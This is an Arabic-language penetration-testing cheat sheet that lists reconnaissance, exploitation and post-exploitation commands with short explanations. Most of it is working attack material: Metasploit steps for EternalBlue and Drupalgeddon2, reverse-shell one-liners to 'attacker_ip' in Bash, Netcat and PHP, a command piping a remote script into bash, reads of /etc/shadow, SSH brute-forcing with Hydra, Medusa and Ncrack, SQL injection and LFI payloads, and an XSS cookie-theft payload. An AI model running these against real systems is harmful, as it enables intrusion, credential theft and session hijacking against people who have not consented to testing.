أوامر وأمثلة مع الشرح:
whois domain.com — جلب تفاصيل النطاق (صاحب النطاق، الشركة، تواريخ التسجيل)nslookup domain.com — استعلام DNS لمعرفة IP أو سجلات MXdig domain.com ANY — إظهار جميع السجلات المتاحةtheHarvester -d domain.com -b google — جمع الإيميلات من جوجلsublist3r -d domain.com — استخراج النطاقات الفرعية المحتملةcrt.sh/?q=domain.com — البحث عن شهادات SSL المرتبطة بالنطاقأوامر Nmap الأكثر استخدامًا:
nmap -sS -p- target — فحص كل المنافذ باستخدام TCP SYNnmap -sV -sC target — اكتشاف الإصدارات وتشغيل السكربتات الأساسيةnmap -A target — فحص شامل (نظام التشغيل، سكربتات، Traceroute)nmap -Pn target — تجاوز فحص Ping (لأهداف لا تستجيب للـ Ping)rustscan -a target — فحص سريع للمنافذ، يُفضل دمجه مع nmap لاحقًامثال عملي:
nmap -sS -sV -O -p 21,22,80 target
الدخول بخدمات FTP وSSH:
ftp target_ip
Name: anonymous
Password: anonymous
أو SSH إذا عُرفت بيانات الدخول:
ssh username@target_ip
إذا لديك مفتاح خاص:
ssh -i id_rsa username@target_ip
أدوات شائعة:
searchsploit wordpress — البحث في قاعدة بيانات exploit-db محليًاmsfconsole — تشغيل إطار عمل Metasploitمثال باستخدام EternalBlue:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
run
أنواع Reverse Shell مع الأمثلة:
باستخدام Bash:
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
باستخدام Netcat:
nc -e /bin/bash attacker_ip 4444
باستخدام PHP:
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
لا تنسَ تشغيل listener قبل التنفيذ:
nc -lvnp 4444
خطوات ضرورية بعد الوصول:
/etc/passwd — المستخدمين/etc/shadow — كلمات مرور مشفرة (إذا root)wp-config.php أو ملفات قواعد بياناتps auxfind / -perm -4000 -type f 2>/dev/nullcurl -Ls https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
طرق التصعيد الشائعة:
sudo -l — الأوامر المسموحة بدون كلمة مرورfind / -perm -4000 -type f — ملفات SUID التي يمكن استغلالهاgetcap -r / 2>/dev/null — صلاحيات capabilities الممنوحة للملفاتاستخدم موقع GTFOBins لاستغلال أوامر عادية لتصعيد الصلاحيات.
أدوات وأمثلة:
Hydra:
hydra -l admin -P rockyou.txt ssh://target_ip
Medusa:
medusa -h target_ip -u admin -P passwords.txt -M ssh
Ncrack:
ncrack -p 22 -U users.txt -P passwords.txt target_ip
طرق البحث عن الثغرات:
searchsploit apache 2.4.49 — البحث محليًا في قاعدة بيانات الثغراتnuclei -u target — البحث التلقائي باستخدام قوالب جاهزةأنواع وأساليب SQLi:
' OR 1=1 --أمثلة:
' OR 1=1 --
admin' --
1 UNION SELECT null,null,null
1 AND ASCII(SUBSTRING((SELECT database()),1,1))=115
' OR SLEEP(5) --
أداة sqlmap:
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" --tables -D database_name
مثال عملي على استغلال ثغرة:
msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS target_ip
run
مثال على استغلال EternalBlue:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
run
التعامل مع بروتوكولات معروفة:
ftp target_ip
smbclient -L \\target_ip\ -N
hydra -l root -P rockyou.txt ssh://target_ip
ما هي LFI: ثغرة تسمح بقراءة أو تضمين ملفات النظام عبر التلاعب بالروابط.
أمثلة عملية:
http://target.com/index.php?page=../../../../etc/passwd
http://target.com/index.php?page=../../../../proc/self/environ
استغلال لقراءة ملفات حساسة:
/etc/passwd - كشف المستخدمين/proc/self/environ - أحيانا تجد متغيرات بيئة تحتوي على بيانات مهمةphp://filter/convert.base64-encode/resource=index.php - قراءة ملفات PHP مشفرة بقاعدة64باستخدام هكر بار (Hackbar) لإرسال طلب LFI:
http://target.com/index.php?page=../../../../etc/passwd
اختطاف الكوكيز باستخدام LFI:
إذا كان بالإمكان تضمين ملفات اللوج أو ملفات تحوي بيانات، يمكنك زرع كود باللوج وأخذه عبر LFI.
GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1
مثال عملي:
GET / HTTP/1.1
User-Agent: <script>document.location='http://attacker_ip/cookie?c='+document.cookie;</script>